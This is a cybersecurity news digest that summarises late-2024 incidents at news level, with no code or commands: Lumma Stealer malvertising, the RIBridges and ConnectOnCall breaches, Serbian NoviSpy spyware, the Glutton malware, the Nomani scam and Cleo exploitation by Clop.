Daily Brief

President-elect Trump's administration intends to adopt a proactive offensive strategy in cybersecurity against nation-state adversaries. Congressman Mike Waltz, the proposed national security advisor, criticized previous administrations for focusing excessively on defense in cyber warfare. Waltz highlighted active threats from Chinese cyber groups such as Salt Typhoon and Volt Typhoon, the latter having recently reactivated a botnet targeting critical infrastructure. The Trump administration is considering collaboration with the private tech sector to enhance U.S. cybersecurity capabilities and to potentially target adversaries. Details regarding the implementation of this new cyber approach remain vague, though sanctions and altering international cyber doctrines were hinted at. U.S.-China cyber relations are tense, with mutual accusations of hacking and non-compliance with a 2015 pact to avoid cyber attacks on each other. The potential for a cyber arms race or escalation in retaliatory measures between the U.S. and China is a significant concern.

A malvertising campaign using fake CAPTCHA verification pages distributed the Lumma Stealer malware, infecting users with a sophisticated info-stealing virus. The campaign, called "DeceptionAds," utilized the Monetag ad network to broadcast over a million ad impressions daily across 3,000 websites. Victims were lured into executing malicious PowerShell commands, which downloaded and installed Lumma Stealer onto their devices. The malware targets sensitive information, including passwords, credit cards, and cryptocurrency wallets, from popular browsers and text files. Monetag and BeMob, the platforms involved, took actions to disrupt the campaign, but a resurgence indicates the threat persists. GuardioLabs reported this to the relevant platforms and suggested users avoid executing unknown commands and visiting high-risk websites to prevent such infections.

Deloitte has reported a significant cyberattack on the RIBridges system, a Rhode Island government portal that manages eligibility and applications for various social services. The breach is likely to have exposed personal and financial information, including names, social security numbers, and banking details of individuals who have interacted with the system. While the exact number of affected individuals remains unclear, anyone involved with health coverage or human services in Rhode Island could potentially be impacted. Deloitte has initiated remediation efforts and engaged Experian to establish a support call center, although the staff may not confirm if specific individuals are affected. The affected RIBridges portal is currently offline, requiring residents needing services to revert to paper applications. Reports suggest the attack was carried out by an international cybercriminal group and was first identified by Deloitte on December 5, with confirmation of the breach on December 10. Rhode Island Governor Dan McKee has acknowledged the severity of the incident and reassured public efforts with IT experts and law enforcement to mitigate impacts. Deloitte maintains that no other systems within its network have been compromised, only the client-specific RIBridges system.

Over 910,000 individuals impacted by a breach at Phreesia's subsidiary ConnectOnCall, exposing sensitive health data. ConnectOnCall, a telehealth and after-hours service, experienced unauthorized access from February to May 2024. Personal information exposed includes names, phone numbers, medical info, and for some, Social Security Numbers. Phreesia responded by notifying law enforcement, hiring cybersecurity experts, and temporarily taking ConnectOnCall offline. ConnectOnCall is working on restoring its systems in a secure environment, separate from other Phreesia services. No evidence currently suggests other Phreesia services or that the exposed information has been misused. Affected individuals are encouraged to report any suspected identity theft or fraud associated with this breach.

Rhode Island's RIBridges system, managed by Deloitte, was compromised by the Brain Cipher ransomware gang, exposing personal data. The breach, discovered on December 5, 2024, likely involved theft of personally identifiable information such as names, SSNs, and bank details. Deloitte confirmed the presence of "malicious code" and subsequently took the RIBridges online platforms offline to prevent further access. Affected individuals are advised to reset passwords, place fraud alerts, and implement credit freezes. Despite the service disruption, affected residents can still apply for assistance programs manually via paper application. A dedicated call center has been set up to support impacted individuals and provide further instructions and assistance. Deloitte and authorities are actively investigating the incident along with collaboration from law enforcement agencies.

The Serbian government is accused of using Qualcomm zero-day vulnerabilities to install NoviSpy spyware on Android devices to monitor activists, journalists, and protesters. Google Project Zero identified and fixed one of the exploited zero-days, CVE-2024-43047, in November after Amnesty International's Security Lab found it on a journalist's phone. NoviSpy, linked to the Serbian Security Information Agency (BIA), was reportedly deployed using an exploit chain that includes zero-click attacks leveraging Android's calling features. Amnesty International's analysis suggests that the spyware was installed on potentially hundreds of devices to target human rights activists, journalists, and government critics. Forensic evidence indicated that Android phones were unlocked using Cellebrite tools during device custody, exploiting undisclosed Qualcomm vulnerabilities. Google's Threat Analysis Group (TAG) identified six vulnerabilities in Qualcomm's adsprpc driver through analyzing kernel panic logs provided by Amnesty International. Despite the patches for some vulnerabilities, Qualcomm delayed addressing others beyond the standard 90-day period. Qualcomm has developed fixes for the unpatched vulnerabilities, with updates pending release via official security bulletins.

Cybersecurity researchers have identified a malvertising campaign called DeceptionAds, which leverages a single ad network to propagate harmful ads, causing significant financial and data losses. This campaign is known for redirecting users from sites, such as those offering pirated movies, to fake CAPTCHA pages that deceive them into executing harmful commands. These commands lead to the installation of information stealers like Lumma, and more sophisticated threats including remote access trojans and post-exploitation tools. DeceptionAds operates through Monetag, an ad platform misused by attackers, and uses services like BeMob for cloaking malicious activities, thereby complicating detection efforts by legitimate ad management systems. The operation involves several layers including deceptive publisher sites, a traffic distribution system, and the use of reputable cloud services for hosting malicious CAPTCHA pages. Following the exposure of these activities, over 200 related accounts were terminated on Monetag and BeMob, though the campaign has shown signs of resuming. The cycle of deception detailed by Guardio Labs underscores the critical need for stricter content moderation, robust account validation, and greater accountability within digital advertising networks.

Serbian journalist's phone compromised by NoviSpy spyware after being unlocked using a Cellebrite tool during police detention. NoviSpy enables remote surveillance capabilities including access to the microphone, camera, and harvesting sensitive personal data. Targets of the spyware include activists and journalists, implicating state involvement in surveillance and data theft. Amnesty International's technical report indicates NoviSpy was installed through Android Debug Bridge, with development dating back to at least 2018. Cellebrite, an Israeli firm, investigating misuse of their tools, threatens to cut ties with agencies violating agreements. Associated zero-day exploit found in Qualcomm's chipset software, used by Cellebrite to access devices, was patched in October 2024. Global tech and human rights entities are urging the EU to address the misuse of commercial surveillance technologies. Similar use of espionage tools reported in China and Russia against civilians for surveillance and political repression.

CI/CD pipeline governance is crucial in maintaining agility and compliance in software delivery, balancing rapid development with rigorous standards. Robust governance frameworks manage risks and ensure adherence to security protocols, regulatory requirements, and organizational standards during software development. Effective pipeline governance is increasingly important as systems handle sensitive data and as AI's role in software development grows, necessitating transparency and accountability. AI integration in DevOps requires clear policies for compliance, security, and ethical AI development, with automated checks integrated into the pipeline. Advanced automation tools are essential for continuous compliance and security testing throughout the development process, ensuring AI models meet predefined ethical and regulatory standards. Comprehensive logging, monitoring, and auditing of pipeline activities are critical for demonstrating compliance and facilitating post-incident analysis, particularly with deployed AI models. Regular pipeline audits help identify improvement areas, ensuring the governance framework evolves with changing technologies and regulations. Cultivating a culture of compliance and security awareness among developers is fundamental in a DevOps environment to uphold governance standards.

Cybersecurity experts discovered a sophisticated investment scam called Nomani, which saw a 335% increase in activities from H1 to H2 2024. The scam involves malvertising on social media, using AI-generated video testimonials and company-branded posts to mislead victims into phishing schemes that steal their data. Frequently, the fraudulent ads target previous scam victims with promises of helping recover their lost funds through links that lead to phishing sites. The orchestration uses stolen identities and profiles from legitimate entities across small businesses and government which promote cryptocurrency investment lures varying in name. Once personal information is obtained, scammers engage victims directly, pushing them to invest in fake financial products and requesting more personal and payment data under the guise of enabling payouts. Russian-speaking threat actors are likely behind these scams, employing complex tools like Yandex for tracking and managing phishing infrastructure. The situation raises significant concerns as such scams not only lead to financial losses but also extensive personal and data theft, circumventing even bank fraud-prevention systems. Concurrently, South Korean law enforcement has dismantled a significant online fraud operation using fake trading platforms, demonstrating the global challenge posed by similar cyber threats.

Researchers at QiAnXin XLab have identified a new PHP-based malware, named Glutton, deployed mainly in China, the US, Cambodia, Pakistan, and South Africa. Glutton, attributed with moderate confidence to the Chinese nation-state group Winnti, focuses on cybercrime markets, seeking to exploit cybercriminals' tools against them. The malware exploits popular PHP frameworks like Laravel and ThinkPHP, to harvest sensitive data, introduce ELF backdoors, and enable code injection. Initial compromise techniques include exploiting zero-day vulnerabilities, brute-force attacks, and cleverly marketing compromised hosts on cybercrime forums. The framework comprises highly modular PHP payloads, with the primary module "task_loader" configuring the execution environment to download further malicious components. Glutton lacks traditional stealth techniques seen in other sophisticated malware; it uses unencrypted HTTP communications and lacks obfuscation in its samples. Despite its capabilities to fetch and run PHP payloads covertly, the malware's focus is also on gathering intelligence from cybercrime operators to potentially inform future attacks.

Ukrainian Security Service (SSU) detained two groups of minors recruited by Russia's FSB for espionage activities in Kharkiv. The groups, including children aged 15 and 16, conducted reconnaissance tasks, corrected strikes, and carried out arson under the guise of participating in quest games. The minors were assigned to collect and transmit coordinates, photos, and videos of strategic locations, aiding Russian airstrike operations. Information sourced from these missions led to multiple airstrikes targeting Kharkiv. All involved minors have been detained, and one organizer faces life imprisonment; an FSB liaison officer is charged in absentia under Ukraine's sabotage laws. Concurrently, Ukraine's CERT-UA has issued warnings about new cyberattacks on defense entities by a Russia-linked actor, UAC-0185.

Aqua Security discovered over 296,000 Prometheus internet-facing exporters and 40,000 servers, a significant security risk due to improper safeguards. The exposed Prometheus instances could disclose sensitive data such as tokens, API keys, and system images, and are susceptible to "RepoJacking" and DoS attacks via the /debug/pprof endpoint. Citrix Netscaler is targeted by a brute-force "password spraying" attack, particularly affecting critical infrastructure sectors. Multi-factor authentication and strong password policies are recommended. The U.S. Department of Justice busted Rydox, an online PII marketplace, arresting administrators and shutting down the platform. BeyondTrust reported that an API key for its Remote Support SaaS was compromised, potentially allowing unauthorized password resets on local accounts. A malicious campaign is impersonating video conferencing software to deploy Realst malware, targeting cryptocurrency wallets and stealing various credentials. Apple released critical patches for vulnerabilities in iOS and macOS, encouraging prompt updating to secure devices.

Clop ransomware gang has taken responsibility for recent data theft attacks on Cleo's file transfer software. Exploitation occurred through a critical vulnerability, CVE-2024-50623, allowing unauthorized file operations and remote code execution. Original fix for the vulnerability by Cleo was incomplete, leading to continued exploitation by attackers. Attackers installed a JAVA backdoor during the exploitation, facilitating further data theft and network access. CISA has confirmed that CVE-2024-50623 has been used in ransomware operations. Clop ransomware gang has announced the deletion of previously stolen data and plans to target new companies. The specific number of impacted companies remains unknown, and Cleo has not publicly confirmed the breach.